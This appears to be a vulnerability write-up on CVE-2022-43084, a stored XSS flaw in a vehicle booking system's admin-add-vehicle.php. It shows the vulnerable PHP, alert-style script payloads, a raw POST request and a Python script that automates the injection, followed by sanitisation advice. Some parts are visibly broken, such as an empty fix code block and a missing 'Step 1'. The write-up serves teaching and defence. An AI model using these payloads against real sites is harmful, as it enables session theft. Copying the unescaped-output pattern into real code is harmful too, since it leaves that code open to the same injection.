Cross-Site Scripting (XSS) is a major web security concern. Attackers can inject malicious scripts into web applications, which may lead to stolen cookies, session hijacking, or redirecting users to harmful sites. In this article, we’ll dive deep into a real-world XSS vulnerability marked as CVE-2022-43084, affecting the Vehicle Booking System v1.. We’ll break down how the flaw works, explore its exploitability, and show you how it can be fixed.

Overview of CVE-2022-43084

CVE-2022-43084 is a Stored Cross-Site Scripting (XSS) vulnerability discovered in the admin-add-vehicle.php file of Vehicle Booking System v1.. The flaw allows attackers to inject and execute arbitrary JavaScript code in the context of the admin panel by manipulating the v_name parameter. This could lead to a full takeover of the application or theft of sensitive information if an admin triggers the payload.

- NVD Database Entry
- Vehicle Booking System on SourceCodester
- Exploit Details on Exploit-DB
- OWASP XSS Basics

How the Vulnerability Works

Let’s get technical. The file admin-add-vehicle.php provides a backend form for adding vehicles. A user with the right privileges can submit new vehicle information, such as vehicle name (v_name). The vulnerability happens because the server-side code does not properly sanitize or encode user-provided input before displaying it on the page.

Here’s a simplified look at the vulnerable part in admin-add-vehicle.php

<?php
// ... other code ...
if (isset($_POST['submit'])) {
    $v_name = $_POST['v_name'];
    // Insert directly into DB
    $query = "INSERT INTO vehicles (v_name, ...) VALUES ('$v_name', ...)";
    mysqli_query($conn, $query);
}
?>
<!-- Later, displaying vehicle name somewhere on the admin panel -->
<td><?php echo $row['v_name']; ?></td>

As you can see, the value of v_name is taken straight from user input and inserted into the database without sanitization or escaping. When it’s displayed, it is directly echoed into HTML. This provides attackers with an opportunity to inject malicious JavaScript.

An attacker can set the v_name to something like

"><script>alert('XSS');</script>

Step 2: Submitting the Payload

Using a tool like Burp Suite, Postman, or even the browser’s developer tools, submit the following POST request to add a new vehicle:

POST /admin-add-vehicle.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

v_name="><script>alert('XSS')</script>&other_parameters=...

When the injected vehicle is displayed on any admin panel page, the script will fire

!Exploit Demonstration

Result: An alert box appears, proving JavaScript execution. An attacker could replace alert('XSS') with any JavaScript, including code to steal admin cookies, redirect users, deface the site, etc.

Here’s a simple Python script using requests to automate the payload submission

import requests

url = 'http://target-site.com/admin-add-vehicle.php';
data = {
    'v_name': '"><img src=x onerror=alert("XSS")>',
    'other_param': 'value',
    'submit': '1'
}

session = requests.Session()
# Authenticate here if needed
response = session.post(url, data=data)
print("Payload sent. Check admin panel for XSS pop-up.")

Impact

- Theft of Admin Session Cookies: An attacker could craft a payload to send cookie data to an external server.

Sanitize Input: Always use functions like htmlspecialchars() or libraries that escape output.

`php

`

2. Use Prepared Statements: When inserting user input into the database, use parameterized queries (mysqli or PDO).

Conclusion

CVE-2022-43084 proves how a single unchecked input can open the gates for serious security flaws like Cross-Site Scripting. If you are building administration panels or any kind of web interface, always remember to sanitize, validate, and escape all user-supplied input. For more reading on similar vulnerabilities, check OWASP’s XSS Cheat Sheet.

References

- CVE-2022-43084 @ NVD
- Vehicle Booking System Download
- Exploit Proof-of-Concept

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/02/2022 12:48:00 UTC